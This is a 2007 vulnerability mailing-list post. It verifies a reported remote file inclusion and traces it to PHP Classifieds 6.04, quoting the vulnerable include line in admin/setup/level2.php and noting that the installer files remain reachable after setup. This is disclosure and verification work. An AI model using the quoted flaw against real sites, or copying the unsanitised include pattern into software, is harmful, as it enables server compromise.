[VIM] [false but true] "Allfaclassfieds" RFI no; PHP Classifieds yes
Steven M. Christey
coley at mitre.org
Wed Apr 25 16:13:44 UTC 2007
Researcher: Dr.RoVeR
Ref: Allfaclassfieds (level2.php dir) remote file inclusion
http://www.securityfocus.com/archive/1/archive/1/466648/100/0/threaded
With a name like "allfaclassfieds" that smelled like a typo, I
investigated a little bit more. The referenced download URL creates a
directory "phpclassifides". No mention of "allfa" is anywhere
according to grep.
Further grep finds this to be PHP Classifieds.
The presence of a "upgr_603_to_604.php" file, and most files dating
back to 2001, along with UPGRADE.txt, suggests an old version of 6.04;
latest version, released on April 14, is 7.2b.
The relevant RFI code does not appear in level2.php in the newer
version.
But, admin/setup/level2.php in 6.04, we have:
require("$dir/admin/db.php");
as the first executable PHP code.
The installation appears to move from level1.php through level5.php;
the latter deletes the install file. However, there's not any
evidence that the level*.php files are ever cleaned up, leaving them
open for later access.
- Steve
More information about the VIM
mailing list